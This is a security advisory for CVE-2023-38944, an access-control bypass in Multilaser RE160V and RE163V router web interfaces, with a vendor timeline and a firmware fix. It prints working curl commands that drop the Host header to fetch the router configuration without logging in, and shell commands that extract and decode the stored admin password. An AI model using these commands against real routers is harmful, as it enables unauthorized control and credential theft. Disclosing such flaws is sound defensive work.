ulldisclosure-bounces@seclists.org>
Status: RO
Content-Length: 5433
Lines: 153

=====[Tempest Security Intelligence - Security Advisory -
CVE-2023-38944]=======

  Access Control Bypass in Multilaser routers' Web Management Interface

  Author: Vinicius Moraes  < vinicius.moraes.w () gmail com >

=====[Table of
Contents]========================================================

1. Overview
2. Detailed description
3. Other contexts & solutions
4. Acknowledgements
5. Timeline
6. References

=====[1.
Overview]==============================================================

* Systems affected: Multilaser RE160V web interface - V12.03.01.09_pt
(verified)
                                        (other routers/versions may be
affected)
                    Multilaser RE163V web interface - V12.03.01.10_pt
(verified)
                                        (other routers/versions may be
affected)
* Release date: 28/02/2024
* CVSS score: 7.7 / High
* CVSS vector:
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
* Impact: This vulnerability allows attackers to bypass the access control
of
          the routers' web interface and perform management actions, such as
          changing the DNS settings, enabling router remote access,
changing the
          IP routing table, and retrieving the WiFi and management
application
          passwords. A noteworthy aspect also regards the fact that the
attack
          can be conducted remotely.

=====[2. Detailed
description]==================================================

The affected Multilaser routers have a web management interface designed to
graphically assist users in configuring features and diagnosing problems.
However, there is a bug in its access control mechanism that allows
unauthenticated users to access the routers' management features.

In order to exploit this bug, it is necessary to remove the Host header of
the
HTTP requests. The following example shows how an unauthenticated user (not
bearing a credential or session token) could perform it by using the curl
tool[1] to retrieve, for example, a backup of the router config:

[snippet]
$ # traditional unauthenticated request being redirected to the login page
$ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/RouterCfm.cfg | head -8
HTTP/1.0 302 Redirect
Server: GoAhead-Webs
Date: Sun Jun 28 11:59:42 2009
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Location: http://[routerIpAddress]/login.html

$ # malicious unauthenticated request getting the router config
$ curl -isOH 'Host:' [routerIpAddress]/cgi-bin/DownloadCfg/RouterCfm.cfg
$ head -8 RouterCfm.cfg
HTTP/1.0 200 OK
Date: Sun Jun 28 12:00:00 2009
Server: GoAhead-Webs
Last-modified: Sun Jun 28 12:00:00 2009
Content-length: 16108
Content-type: config/conf
Connection: close

[/snippet]

By performing the aforementioned steps, an attacker gains access to all
features
of the web interface, either by exploiting the issue in other endpoints or
by
using the interface password, contained in the router config, as a
traditional
user:

[snippet]

$ # getting the web interface password (in this example: "myPass333")
$ # stored in base64 in the config file
$ awk -F 'd=' '/http_passwd=/{ print $2 }' RouterCfm.cfg | tr -d '\15'
bXlQYXNzMzMz
$ # decoding the web interface password
$ echo "bXlQYXNzMzMz" | base64 -d
myPass333

[/snippet]

This vulnerability can be exploited remotely via a malicious mobile/desktop
application performing HTTP requests against the router, or locally by
connecting to a vulnerable router (such as through the wireless
infrastructure
of a coffee shop or airport).

=====[3. Other contexts &
solutions]============================================

Conceptually, in order to fix this issue, the server receiving the request
must
always validate the session token as a prerequisite for enforcing access
control, regardless of any header. Upon not receiving a valid session token
within the request, users should be redirected to the login page.

Practically, to mitigate this issue, the routers should be updated to
firmware
V12.03.01.12 or newer[3][4].

=====[4.
Acknowledgements]======================================================

  Joaquim Brasil de Oliveira  < palulabrasil () gmail com >
                              < twitter.com/palulabr >
  Tempest Security Intelligence[2]

=====[5.
Timeline]==============================================================

28/04/2023 - The bug regarding model RE163V was reported to the vendor;
29/06/2023 - A new contact was made with the company;
29/06/2023 - Vendor informed they were analysing the bug;
19/07/2023 - Vendor shared a new firmware update for RE163V;
25/07/2023 - The same bug in model RE160V was reported to the vendor;
04/08/2023 - Vendor shared a new firmware update for RE163V;
30/08/2023 - Vendor fixed the bug in RE163V with firmware V12.03.01.12;
16/10/2023 - Vendor fixed the bug in RE160V with firmware V12.03.01.12;
26/10/2023 - vendor released the updates on its website[3][4].

=====[6.
References]============================================================

  [1] https://curl.se
  [2] https://tempest.com.br
  [3]
https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-3-ant-re163v
  [4]
https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-2-ant-re160v